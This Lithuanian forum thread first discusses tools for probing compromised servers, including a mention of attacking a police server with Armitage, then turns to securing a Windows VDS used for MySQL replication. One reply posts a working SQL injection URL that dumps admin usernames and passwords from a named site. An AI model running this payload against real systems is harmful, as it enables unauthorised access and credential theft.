2017-05-27- 14:25
mahelad rašė:Sveiki. Gal galite patarti, kokį softą HTTP GET siuntimui ir Response gavimui su tolesne analize naudoti?
mahelad rašė:Ką jau pastebėjau, dažnai jų kenkėjiški įrankiai sėdi ant nulaužtų serverių. PVZ stambios statybų kompanijos tinklapyje yra php skriptas, į kuri yra nukreipiamos spamėrių aukos. Jei esu teisus, gera dalis spaminių laiškų parodo į serverius, turinčius didelių saugumo spragų. Gal gausis iš White Hack pinigų pasidaryti
Ačiū iš anksto.
2017-05-27- 17:35
Katinas rašė:Galbūt Zap padės. Dar gali pasižiūrėt ką savo arsenale turi Kali ir Parrot, tada reikiamo įrankio ieškokis atskirai. Nors man atrodo, kad daliai užduočių užteks ir Chrome DevTools arba FireFox analogo.
Katinas rašė:Pinigais čia nelabai kvepia, labiau veltui sugaištu laiku Nors savininkui ir hostingui pranešt vistiek derėtų.
2017-05-27- 17:53
mahelad rašė:Jei jiems pavyko nulaužti, reiškia yra spraga. Reiškia ir man gali pavykti atkartoti įsilaužimą arba gauti į savo letenas 0day exploitą
2017-05-27- 17:59
mahelad rašė:Esminis tikslas - smalsumo tenkinimas, pinigai yra antraeiliai. Logika paprasta. Jei jiems pavyko nulaužti, reiškia yra spraga. Reiškia ir man gali pavykti atkartoti įsilaužimą arba gauti į savo letenas 0day exploitą Galbūt kada nors... Kadangi labiau mėgstu White Hack, tinklapio savininkui pranešu. Nors iš lietuvių atgal dažniausiai tik agresijos sulaukdavau o ne pinigų
Dėl Parrot ar Kali - jie labiau akadėminiai nei koviniai įrankiai, bent jau mano akiai. Tiesa kažkada policijos serverio atsparumą testinau su Armitrage hail mary ataka
2017-05-27- 23:02
Katinas rašė:Kali, Parrot ir t.t. paskirtis - testavimas. Bet ten daugiau mažiau yra viskas, ko reikia "ne akademiniam" darbui. Viskas priklauso nuo naudotojo
http://www.auau.lt/index2.php?id=1+union+all+select+1,group_concat(username,%200x20%20,password),3,4,5,6+from+P_admin
2017-06-12- 11:35
2017-06-12- 11:56
mahelad rašė:Sveiki. Turiu windows'inį VDS. Bet po windows'ais nemoku dirbti. Gal kas galite patarti bent kelis pagrindinius patarimus, kaip jį reikia administruoti?
mahelad rašė:1) uždaryti visus nereikalingus portus (blin moku tik IPtables derinti...).
mahelad rašė:2) įdiegti antivirusinę (visos mokamos... linukse bent ClamAv yra...)
mahelad rašė:3) nelandžioti iš serverio po internetą (jokio porno ... )
mahelad rašė:Man reikia mysql replikacijos, bet nesinori laikyti portą 3306 atvirą net po slaptažodžiu. Gal būt suvaryti visą porto 3306 srautą į SSH tunelį ?
mahelad rašė:Ir šiaip ką svarbiausio reikia daryti administruojant tokius serverius? Patarkite, prašau. Ačiū.
2017-06-12- 12:53
2017-06-12- 13:04
mahelad rašė:Didelis DIDELIS AČIŪ. Serverio versija 2012 R2. Serveris bus naudojamas kaip minimum - MySql DB replikacijai. Kaip maksimum - kaip veidrodis projekto tinklapiui. Taip pat į serverį bus keliami visi tinklapio BackUp. Galvoju ant serverio pakurti SVN klientą ir kelti tinklapio BuckUp tiesiog atnaujinant lokalią repozitoriją. Tokiu būdu garantuosiu aktualiausia tinklapio kodo versiją.
Tiksliau dėl rolės sunku pasakyti, nes teturiu techninę užduotį - be pinigu padaryti portalo duomenų dubliavimą. Duota visiška veikimo laisvė, jokių tikslesnių paaiškinimu ir nulinis finansavimas. Įkėlimas bus vykdomas per... Ai kaip nuspręsiu, taip ir bus. Administruojamas... taipogi kaip nuspręsiu. Kol kas administruoju per RDP. Labai patogu jungtis iš po Ubuntu ir dirbti su Windows GUI.
2017-06-12- 13:18
2017-06-12- 13:36
mahelad rašė:Na pirmiausia problema tame, kad pats nesu nei lašo adminas, o ant manęs viską užkrovė
Viskas sukasi dedikuoti.lt. Ten duomenys labai svarbūs. Dėl duomenų saugumo ir galimų nuostolių minimizavimo vadovybė yra pasiruošusi nuomoti VDS. Nes net kelių valandų duomenų praradimas įmonei gali atsistoti į tiek, kiek kainuoja VDS nuoma metams. Kaip jau sakiau, man duota techninė užduotis skamba taip - padaryk kaip nori, bet kad viskas būtu saugu su sąlyga, kad viskas turi veikti ant Windows'o. Alternatyva - statyti dar vieną dėžę DB replikacijai įmonės viduje .... Aš išvys manau, kad ateityje reikės kelių VDS. Viename suksis pagrindinis projektas o ne jo veidrodis, kitas bus naudojamas replikacijai + BuckUp'ams + HearthBeat + kitam monitoringui + kaip veidrodis, jei pagrindinis nukristu. DNS neperjunginėsiu, užteks tiesiog pasakyti - jei neveikia pagrindinis serveris junkitės į atsarginisserveris.lt.
2017-06-12- 14:07
2017-06-12- 14:27
mahelad rašė:Na į dedikuoti kelti buvo mano sprendimas. Nes pamaniau, kad pigu + visada geriau, kai paslaugos tiekėjas yra šalia o ne užsienyje. Jei kas veiks blogai, gal būt bus paprasčiau kelti pretenzijas. Gal ir klaidą padariau, pasitikėjęs tautišku tiekėju su Beta produktu, nežinau...
Bet kas iškarto nepatiko, nėra atskiro Firewall serverio ar ko nors panašaus. Pažįstu adminų, kurie sužinoję, kad teks saugoti windows'inę mašiną su nativ firewall mesdavo darbą... Bent geležiniuose (ne VDS) serveriuose man žinomas sprendimas - kovinė mašina su projektu -> linuksinis firewall serveris -> išėjimas į internetą. O čia viskas atvira...
Štai kaip atrodo valdymo skydas. Galima pažiūrėti statistika, perkrauti serverį, pakelti VPN konsolę ir viskas.
2017-06-12- 14:46
2017-06-12- 15:09
mahelad rašė:Na ant dedikuotu teks dirbti, nes niekur nepabėgsiu, jai jau įlindau... Emm... o kam šifruoti diską?
mahelad rašė:Visus portus uždarysiu. Teks laikyti bent vieną portą replikacijai atvirą. Mūsų antrasis adminas uždraudė sujunginėti dvi mašinas per VPN ar kitą tunelį. Sako tegul replikacija eina tiesiogiai per išorinius portus tarp dvejų serverių. Atseit jei nulauš vieną mašiną, su kita nebus tiesioginio ryšio. Nežinau kaip tiksliau paaiškinti, nes čia yra mano žinių riba ir net teisingus terminus sunku parinkinėti.
mahelad rašė:Jei suges pagrindinis serveris, atidarysiu 80,433 portus ir įsileisiu vartotojus į projekto veidrodį. Bet po to turėsiu problemų su DB sinchronizavimu, nes šiap replikacijai skirtos DB negalima liesti.